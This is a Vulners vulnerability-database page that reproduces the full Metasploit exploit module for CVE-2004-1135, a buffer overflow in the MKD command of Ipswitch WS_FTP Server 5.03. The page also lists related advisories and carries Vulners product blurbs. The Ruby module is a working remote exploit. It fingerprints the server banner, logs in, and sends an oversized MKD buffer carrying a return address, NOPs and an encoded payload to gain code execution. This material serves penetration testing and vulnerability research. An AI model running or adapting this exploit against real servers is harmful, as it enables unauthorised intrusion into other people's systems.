Lucene search
K

WS-FTP Server 5.03 MKD Overflow

🗓️ 02 Dec 2005 01:18:51Reported by et <[email protected]>, Reed Arvin <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 29 Views

WS-FTP Server 5.03 MKD Overflow exploit for buffer overflow in MKD comman

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
WS_FTP Server < 5.04 Multiple Vulnerabilities (2)
30 Nov 200400:00
nessus
Tenable Nessus
WS_FTP Server Multiple Command Remote Overflow DoS
30 Nov 200400:00
nessus
Circl
CVE-2004-1135
5 Oct 201000:00
circl
Check Point Advisories
Ipswitch WS_FTP Server Commands Buffer Overflow Denial of Service (CVE-2004-1135)
30 Nov 200900:00
checkpoint_advisories
CVE
CVE-2004-1135
8 Dec 200405:00
cve
Cvelist
CVE-2004-1135
8 Dec 200405:00
cvelist
Exploit DB
Ipswitch WS_FTP Server 5.03 - MKD Overflow (Metasploit)
5 Oct 201000:00
exploitdb
NVD
CVE-2004-1135
10 Jan 200505:00
nvd
Packet Storm
WS-FTP Server 5.03 MKD Overflow
26 Nov 200900:00
packetstorm
Saint
WS_FTP MKD command buffer overflow
10 Mar 200600:00
saint
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WS-FTP Server 5.03 MKD Overflow',
      'Description'    => %q{
        This module exploits the buffer overflow found in the MKD
        command in IPSWITCH WS_FTP Server 5.03 discovered by Reed
        Arvin.
      },
      'Author'         => [ 'et', 'Reed Arvin <reedarvin[at]gmail.com>' ],
      'License'        => BSD_LICENSE,
      'Platform'       => [ 'win' ],
      'References'     =>
        [
          [ 'CVE', '2004-1135' ],
          [ 'OSVDB', '12509' ],
          [ 'BID', '11772'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 480,
          'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
          'StackAdjustment' => -3500,
        },
      'Targets'        =>
        [
          [
            'WS-FTP Server 5.03 Universal',
            {
              'Ret'      => 0x25185bb8,
              # Address is executable to allow XP and 2K
              # 0x25185bb8 = push esp, ret (libeay32.dll)
              # B85B1825XX = mov eax,0xXX25185b
            },
          ],
        ],
      'DisclosureDate' => '2004-11-29',
      'DefaultTarget' => 0))
  end

  def check
    connect
    disconnect
    if (banner =~ /5\.0\.3/)
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    c = connect_login
    return if not c

    print_status("Trying target #{target.name}...")

    buf         = rand_text_alphanumeric(8192)
    buf[498, 4] = [ 0x7ffd3001 ].pack('V')
    buf[514, 4] = [ target.ret ].pack('V')
    buf[518, 4] = [ target.ret ].pack('V')
    buf[522, 2] = make_nops(2)
    buf[524, payload.encoded.length] = payload.encoded

    send_cmd( ['MKD', buf], true );

    handler
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.6High risk
Vulners AI Score7.6
CVSS 25
EPSS0.49642
29